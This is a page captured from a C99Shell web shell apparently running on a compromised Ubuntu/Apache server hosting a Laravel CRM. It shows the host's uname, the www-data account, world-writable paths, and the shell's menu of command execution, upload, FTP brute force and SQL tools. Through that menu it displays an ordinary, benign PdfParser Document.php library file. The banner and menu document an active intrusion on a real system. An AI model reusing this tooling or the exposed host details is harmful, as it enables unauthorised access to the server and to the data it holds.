!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache/2.4.41 (Ubuntu). PHP/8.0.30 

uname -a: Linux apirnd 5.4.0-204-generic #224-Ubuntu SMP Thu Dec 5 13:38:28 UTC 2024 x86_64 

uid=33(www-data) gid=33(www-data) groups=33(www-data) 

Safe-mode: OFF (not secure)

/var/www/html/laravel-crm/vendor/smalot/pdfparser/src/Smalot/PdfParser/   drwxrwxrwx
Free 12.95 GB of 57.97 GB (22.35%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     Document.php (15.15 KB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

/**
 * @file
 *          This file is part of the PdfParser library.
 *
 * @author  Sébastien MALOT <sebastien@malot.fr>
 *
 * @date    2017-01-03
 *
 * @license LGPLv3
 *
 * @url     <https://github.com/smalot/pdfparser>
 *
 *  PdfParser is a pdf library written in PHP, extraction oriented.
 *  Copyright (C) 2017 - Sébastien MALOT <sebastien@malot.fr>
 *
 *  This program is free software: you can redistribute it and/or modify
 *  it under the terms of the GNU Lesser General Public License as published by
 *  the Free Software Foundation, either version 3 of the License, or
 *  (at your option) any later version.
 *
 *  This program is distributed in the hope that it will be useful,
 *  but WITHOUT ANY WARRANTY; without even the implied warranty of
 *  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 *  GNU Lesser General Public License for more details.
 *
 *  You should have received a copy of the GNU Lesser General Public License
 *  along with this program.
 *  If not, see <http://www.pdfparser.org/sites/default/LICENSE.txt>.
 */

namespace Smalot\PdfParser;

use 
Smalot\PdfParser\Encoding\PDFDocEncoding;
use 
Smalot\PdfParser\Exception\MissingCatalogException;

/**
 * In-memory representation of a parsed PDF document.
 *
 * Holds the parsed objects, an index of those objects keyed by the "Type" and
 * "Subtype" entries of their headers, the trailer header, and the document
 * details (Info entries, page count and XMP metadata).
 *
 * Technical references :
 * - http://www.mactech.com/articles/mactech/Vol.15/15.09/PDFIntro/index.html
 * - http://framework.zend.com/issues/secure/attachment/12512/Pdf.php
 * - http://www.php.net/manual/en/ref.pdf.php#74211
 * - http://cpansearch.perl.org/src/JV/PostScript-Font-1.10.02/lib/PostScript/ISOLatin1Encoding.pm
 * - http://cpansearch.perl.org/src/JV/PostScript-Font-1.10.02/lib/PostScript/ISOLatin9Encoding.pm
 * - http://cpansearch.perl.org/src/JV/PostScript-Font-1.10.02/lib/PostScript/StandardEncoding.pm
 * - http://cpansearch.perl.org/src/JV/PostScript-Font-1.10.02/lib/PostScript/WinAnsiEncoding.pm
 *
 * Class Document
 */
class Document
{
    /**
     * Objects of the document, keyed by object id.
     *
     * @var PDFObject[]
     */
    protected $objects = [];

    /**
     * Index of the objects by type, built by buildDictionary():
     * [type => ['all' => [id => object], 'subtype' => [subtype => [id => object]]]].
     *
     * @var array
     */
    protected $dictionary = [];

    /**
     * @var Header
     */
    protected $trailer;

    /**
     * XMP metadata accumulated by extractXMPMetadata().
     *
     * @var array<mixed>
     */
    protected $metadata = [];

    /**
     * Document details, built by buildDetails(). Defaults to an empty array so
     * that getDetails() honours its "array" return type before init() ran.
     *
     * @var array
     */
    protected $details = [];

    /**
     * Creates an empty document with an empty trailer header.
     */
    public function __construct()
    {
        $this->trailer = new Header([], $this);
    }

    /**
     * (Re)builds the type dictionary and the details array, then initializes
     * the header of every object and the object itself.
     */
    public function init()
    {
        $this->buildDictionary();

        $this->buildDetails();

        // Propagate init to objects.
        foreach ($this->objects as $object) {
            $object->getHeader()->init();
            $object->init();
        }
    }

    /**
     * Build dictionary based on type header field.
     *
     * Objects whose "Type" content is empty (loose comparison with null) are
     * not indexed; the same applies to the "Subtype" level.
     */
    protected function buildDictionary()
    {
        // Start from scratch on every call.
        $this->dictionary = [];

        foreach ($this->objects as $id => $object) {
            // Cache objects by type and subtype
            $type = $object->getHeader()->get('Type')->getContent();

            if (null != $type) {
                if (!isset($this->dictionary[$type])) {
                    $this->dictionary[$type] = [
                        'all' => [],
                        'subtype' => [],
                    ];
                }

                $this->dictionary[$type]['all'][$id] = $object;

                $subtype = $object->getHeader()->get('Subtype')->getContent();
                if (null != $subtype) {
                    if (!isset($this->dictionary[$type]['subtype'][$subtype])) {
                        $this->dictionary[$type]['subtype'][$subtype] = [];
                    }
                    $this->dictionary[$type]['subtype'][$subtype][$id] = $object;
                }
            }
        }
    }

    /**
     * Build details array.
     *
     * Combines the details of the trailer's "Info" header (when available),
     * the page count under the "Pages" key (0 when the pages cannot be
     * retrieved), and the XMP metadata, which overrides equally named keys.
     * String values are repaired/decoded to UTF-8 along the way.
     */
    protected function buildDetails()
    {
        $details = [];

        // Extract document info
        if ($this->trailer->has('Info')) {
            /** @var PDFObject $info */
            $info = $this->trailer->get('Info');
            // This could be an ElementMissing object, so we need to check for
            // the getHeader method first.
            if (null !== $info && method_exists($info, 'getHeader')) {
                $details = $info->getHeader()->getDetails();
            }
        }

        // Retrieve the page count
        try {
            $pages = $this->getPages();
            $details['Pages'] = \count($pages);
        } catch (\Exception $e) {
            $details['Pages'] = 0;
        }

        // Decode and repair encoded document properties
        foreach ($details as $key => $value) {
            if (!\is_string($value)) {
                continue;
            }

            // If the string is already UTF-8 encoded, that means we only
            // need to repair Adobe's ham-fisted insertion of line-feeds
            // every ~127 characters, which doesn't seem to be multi-byte
            // safe
            if (mb_check_encoding($value, 'UTF-8')) {
                // Remove literal backslash + carriage return ("\" followed by "\r")
                $value = str_replace("\x5c\x0d", '', $value);

                // Remove backslash plus bytes written into high part of
                // multibyte unicode character
                while (preg_match("/\x5c\x5c\xe0([\xb4-\xb8])(.)/", $value, $match)) {
                    $diff = (\ord($match[1]) - 182) * 64;
                    $newbyte = PDFDocEncoding::convertPDFDoc2UTF8(\chr(\ord($match[2]) + $diff));
                    // Replace the exact matched bytes. Building a second regex
                    // from the captured bytes would break (or over-match) when
                    // a captured byte is a regex metacharacter such as "/" or "(".
                    $value = str_replace($match[0], $newbyte, $value);
                }

                // Remove bytes written into low part of multibyte unicode
                // character
                while (preg_match("/(.)\x9c\xe0([\xb3-\xb7])/", $value, $match)) {
                    $diff = \ord($match[2]) - 181;
                    $newbyte = \chr(\ord($match[1]) + $diff);
                    // Same reasoning as above: literal replacement of the match.
                    $value = str_replace($match[0], $newbyte, $value);
                }

                // Remove this byte string that Adobe occasionally adds
                // between two single byte characters in a unicode string
                $value = str_replace("\xe5\xb0\x8d", '', $value);

                $details[$key] = $value;
            } else {
                // If the string is just PDFDocEncoding, remove any line-feeds
                // and decode the whole thing.
                $value = str_replace("\\\r", '', $value);
                $details[$key] = PDFDocEncoding::convertPDFDoc2UTF8($value);
            }
        }

        $details = array_merge($details, $this->metadata);

        $this->details = $details;
    }

    /**
     * Extract XMP Metadata
     *
     * Parses $content as XML and merges the resulting property tree into the
     * metadata of this document. Nothing is merged when parsing fails or when
     * the packet declares a "dc:format" other than "application/pdf".
     *
     * @param string $content raw XMP packet (XML)
     */
    public function extractXMPMetadata(string $content): void
    {
        $xml = xml_parser_create();
        xml_parser_set_option($xml, \XML_OPTION_SKIP_WHITE, 1);

        if (1 === xml_parse_into_struct($xml, $content, $values, $index)) {
            /*
             * short overview about the following code parts:
             *
             * The output of xml_parse_into_struct is a single dimensional array (= $values), and the $stack is a last-on,
             * first-off array of pointers to positions in $metadata, while iterating through it, that potentially turn the
             * results into a more intuitive multi-dimensional array. When an "open" XML tag is encountered,
             * we save the current $metadata context in the $stack, then create a child array of $metadata and
             * make that the current $metadata context. When a "close" XML tag is encountered, the operations are
             * reversed: the most recently added $metadata context from $stack (IOW, the parent of the current
             * element) is set as the current $metadata context.
             */
            $metadata = [];
            $stack = [];
            foreach ($values as $val) {
                // Standardize to lowercase
                $val['tag'] = strtolower($val['tag']);

                // Ignore structural x: and rdf: XML elements
                if (0 === strpos($val['tag'], 'x:')) {
                    continue;
                } elseif (0 === strpos($val['tag'], 'rdf:') && 'rdf:li' != $val['tag']) {
                    continue;
                }

                switch ($val['type']) {
                    case 'open':
                        // Create an array of list items
                        if ('rdf:li' == $val['tag']) {
                            $metadata[] = [];

                            // Move up one level in the stack
                            $stack[\count($stack)] = &$metadata;
                            $metadata = &$metadata[\count($metadata) - 1];
                        } else {
                            // Else create an array of named values
                            $metadata[$val['tag']] = [];

                            // Move up one level in the stack
                            $stack[\count($stack)] = &$metadata;
                            $metadata = &$metadata[$val['tag']];
                        }
                        break;

                    case 'complete':
                        if (isset($val['value'])) {
                            if ('rdf:li' == $val['tag']) {
                                // Assign a value to this list item
                                $metadata[] = $val['value'];
                            } else {
                                // Else assign a value to this property
                                $metadata[$val['tag']] = $val['value'];
                            }
                        }
                        break;

                    case 'close':
                        // If the value of this property is an array
                        if (\is_array($metadata)) {
                            // If the value is a single element array
                            // where the element is of type string, use
                            // the value of the first list item as the
                            // value for this property
                            if (1 == \count($metadata) && isset($metadata[0]) && \is_string($metadata[0])) {
                                $metadata = $metadata[0];
                            } elseif (0 == \count($metadata)) {
                                // if the value is an empty array, set
                                // the value of this property to the empty
                                // string
                                $metadata = '';
                            }
                        }

                        // Move down one level in the stack
                        $metadata = &$stack[\count($stack) - 1];
                        unset($stack[\count($stack) - 1]);
                        break;
                }
            }

            // Only use this metadata if it's referring to a PDF
            if (!isset($metadata['dc:format']) || 'application/pdf' == $metadata['dc:format']) {
                // According to the XMP specifications: 'Conflict resolution
                // for separate packets that describe the same resource is
                // beyond the scope of this document.' - Section 6.1
                // Source: https://www.adobe.com/devnet/xmp.html
                // Source: https://github.com/adobe/XMP-Toolkit-SDK/blob/main/docs/XMPSpecificationPart1.pdf
                // So if there are multiple XMP blocks, just merge the values
                // of each found block over top of the existing values
                $this->metadata = array_merge($this->metadata, $metadata);
            }
        }
        xml_parser_free($xml);
    }

    /**
     * Returns the type/subtype index built by buildDictionary().
     */
    public function getDictionary(): array
    {
        return $this->dictionary;
    }

    /**
     * Replaces the objects of the document and re-runs init().
     *
     * @param PDFObject[] $objects
     */
    public function setObjects($objects = [])
    {
        $this->objects = (array) $objects;

        $this->init();
    }

    /**
     * @return PDFObject[]
     */
    public function getObjects()
    {
        return $this->objects;
    }

    /**
     * Returns the object stored under the given id, or null when there is none.
     *
     * @return PDFObject|Font|Page|Element|null
     */
    public function getObjectById(string $id)
    {
        if (isset($this->objects[$id])) {
            return $this->objects[$id];
        }

        return null;
    }

    /**
     * Tells whether at least one object of the given type (and, optionally,
     * subtype) is indexed in the dictionary.
     */
    public function hasObjectsByType(string $type, ?string $subtype = null): bool
    {
        return 0 < \count($this->getObjectsByType($type, $subtype));
    }

    /**
     * Returns the indexed objects of the given type, keyed by object id.
     *
     * When $subtype is non-empty only the objects of that subtype are
     * returned. Unknown types or subtypes yield an empty array.
     */
    public function getObjectsByType(string $type, ?string $subtype = null): array
    {
        if (!isset($this->dictionary[$type])) {
            return [];
        }

        if (null != $subtype) {
            if (!isset($this->dictionary[$type]['subtype'][$subtype])) {
                return [];
            }

            return $this->dictionary[$type]['subtype'][$subtype];
        }

        return $this->dictionary[$type]['all'];
    }

    /**
     * @return Font[]
     */
    public function getFonts()
    {
        return $this->getObjectsByType('Font');
    }

    /**
     * Returns the first indexed font, or null when the document has none.
     */
    public function getFirstFont(): ?Font
    {
        $fonts = $this->getFonts();
        if ([] === $fonts) {
            return null;
        }

        return reset($fonts);
    }

    /**
     * Returns the pages of the document.
     *
     * Lookup order: the "Pages" entry of the first "Catalog" object, then all
     * "Pages" objects, then all "Page" objects (unordered).
     *
     * @return Page[]
     *
     * @throws MissingCatalogException when none of the lookups applies
     */
    public function getPages()
    {
        if ($this->hasObjectsByType('Catalog')) {
            // Search for catalog to list pages.
            $catalogues = $this->getObjectsByType('Catalog');
            $catalogue = reset($catalogues);

            /** @var Pages $object */
            $object = $catalogue->get('Pages');
            if (method_exists($object, 'getPages')) {
                return $object->getPages(true);
            }
        }

        if ($this->hasObjectsByType('Pages')) {
            // Search for pages to list kids.
            $pages = [];

            /** @var Pages[] $objects */
            $objects = $this->getObjectsByType('Pages');
            foreach ($objects as $object) {
                $pages = array_merge($pages, $object->getPages(true));
            }

            return $pages;
        }

        if ($this->hasObjectsByType('Page')) {
            // Search for 'page' (unordered pages).
            $pages = $this->getObjectsByType('Page');

            return array_values($pages);
        }

        throw new MissingCatalogException('Missing catalog.');
    }

    /**
     * Returns the trimmed text of the pages, joined by a blank line.
     *
     * Pages that are null or whose trimmed text is falsy are skipped.
     *
     * @param int|null $pageLimit when a positive integer, only the first
     *                            $pageLimit pages are used
     *
     * @throws MissingCatalogException propagated from getPages()
     */
    public function getText(?int $pageLimit = null): string
    {
        $texts = [];
        $pages = $this->getPages();

        // Only use the first X number of pages if $pageLimit is set and positive.
        if (\is_int($pageLimit) && 0 < $pageLimit) {
            $pages = \array_slice($pages, 0, $pageLimit);
        }

        foreach ($pages as $page) {
            // In some cases, the $page variable may be null.
            if (null === $page) {
                continue;
            }
            if ($text = trim($page->getText())) {
                $texts[] = $text;
            }
        }

        return implode("\n\n", $texts);
    }

    /**
     * Returns the trailer header of the document.
     */
    public function getTrailer(): Header
    {
        return $this->trailer;
    }

    /**
     * Replaces the trailer header. Details are not rebuilt until init() runs.
     */
    public function setTrailer(Header $trailer)
    {
        $this->trailer = $trailer;
    }

    /**
     * Returns the details built by buildDetails() (empty before init()).
     */
    public function getDetails(): array
    {
        return $this->details;
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0071 ]--